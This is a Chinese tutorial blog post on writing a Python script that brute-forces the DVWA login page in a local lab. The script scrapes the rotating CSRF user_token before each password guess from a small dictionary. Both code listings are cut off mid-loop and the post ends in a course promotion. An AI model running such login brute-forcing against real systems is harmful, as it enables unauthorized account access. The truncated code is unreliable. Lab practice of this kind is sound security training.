用python编写渗透工具-python编写渗透测试工具之一——dvwa登录爆破
dvwa是一个开源的由php语言编写、使用mysql数据库的漏洞利用平台,平台涵盖web应用常见的安全漏洞,如命令执行、文件包含、SQL注入、XSS、CSRF等安全漏洞,供安全研究人员和白帽子进行web安全的学习和演练。本文主要内容是使用python编写dvwa登录的暴力破解脚本。dvwa的本地搭建这里就不赘述了,网上有很多介绍的文章大家可自行度娘,本次环境使用的是docker技术在kali li
dvwa是一个开源的由php语言编写、使用mysql数据库的漏洞利用平台,平台涵盖web应用常见的安全漏洞,如命令执行、文件包含、SQL注入、XSS、CSRF等安全漏洞,供安全研究人员和白帽子进行web安全的学习和演练。
本文主要内容是使用python编写dvwa登录的暴力破解脚本。dvwa的本地搭建这里就不赘述了,网上有很多介绍的文章大家可自行度娘,本次环境使用的是docker技术在kali linux虚拟机上进行的搭建。
一、爆破原理
爆破的原理很简单,就是对用户名和密码进行不断尝试,直至成功。一般在渗透过程中会配置相应的字典,以提高爆破成功的效率。好了,这里不多说,我们打开dvwa的登录界面,输入正确的用户名admin和错误的密码123(正确的密码是password),查看登录结果。
从登录结果明显可以看到"Login Failed"字样,既登录失败。这里值得关注的是,查看发送的数据包,提交的post数据中有user_token,且每次刷新页面的时候user_token都会有变化,这会不会是防止burpsuite类工具爆破的一种机制呢。经查,服务器在每次登录失败或刷新页面时都会返回一个hidden域,内容就是这个csrf_token。并且会在每次发送登录请求时,提交这个数据。
现在有一个猜想,如果我登录提供正确的用户名admin和正确的密码password,但不提交这个user_token,会怎么样呢?服务器会拒绝吗?结果如图3所示,服务器返回结果是"CSRF token is incorrect"。可见,我们要达到爆破的目的,必须在提交参数时包含上次服务器返回给我们的csrf_token。
二、代码编写
引入相应的包,因为csrf_token在服务器端校验。为了保证会话的连续性,应保证Session的一致。import requests
from bs4 import BeautifulSoup
s = requests.Session()
csrf_token=""
2.识别页面的csrf_token,本文采用的方法是使用BeastifuSoup解析页面,提取hidden标签内csrf_token的value,#第一步,获取网页的csrf_token
url="http://192.168.140.131/login.php"
heads = {}
heads[
"User-Agent"] = "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
req = s.get(url)
req.encoding = "UTF-8"
html = req.text
soup_texts = BeautifulSoup(html,"lxml")
#print(soup_texts)
csrf_token=soup_texts.find("input", {"name": "user_token"}).get("value")
3.开始登录页面的爆破,携带页面的csrf_token、读取字典内的密码,发送登录请求。如果登录失败则页面会返回“Login Failed”,识别失败页面的csrf_token、更换密码并继续发送请求,直至所有字典遍历完毕或登录成功。这里为了演示方便我设置了一个小字典,存放在列表中password=["abc","123","abcd","password","ssccc"]。大家在实战中,完全可以从txt文件中读取密码。#设置密码字典password
password=["abc","123","abcd","password","ssccc"]
lenth=len(password)
count=0
flag=True
while(flag and count4.爆破效果
三、完整代码import requests
from bs4 import BeautifulSoup
s = requests.Session()
csrf_token=""
def main():
#第一步,获取网页的csrf_token
url="http://192.168.140.131/login.php"
heads = {}
heads[
"User-Agent"] = "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
req = s.get(url)
req.encoding = "UTF-8"
html = req.text
soup_texts = BeautifulSoup(html,"lxml")
#print(soup_texts)
csrf_token=soup_texts.find("input", {"name": "user_token"}).get("value")
#设置密码字典password
password=["abc","123","abcd","password","ssccc"]
lenth=len(password)
count=0
flag=True
while(flag and count我自己是一名从事了多年的Python老程序员,辞职目前在做自己的Python私人定制课程,今年整理了一份最适合2019年学习的Python学习干货,免费赠送给每一位小伙伴
如果你也想当一位程序员,学习Python,那么帮忙转发一下然后再关注小编后私信“01”可以得到我整理的这些Python资料了(私信方法:点击我头像进我主页有个上面有个私信按钮)。
瓜分20万奖金 获得内推名额 丰厚实物奖励 易参与易上手
更多推荐
0
0- 0
已为社区贡献1条内容
所有评论(0)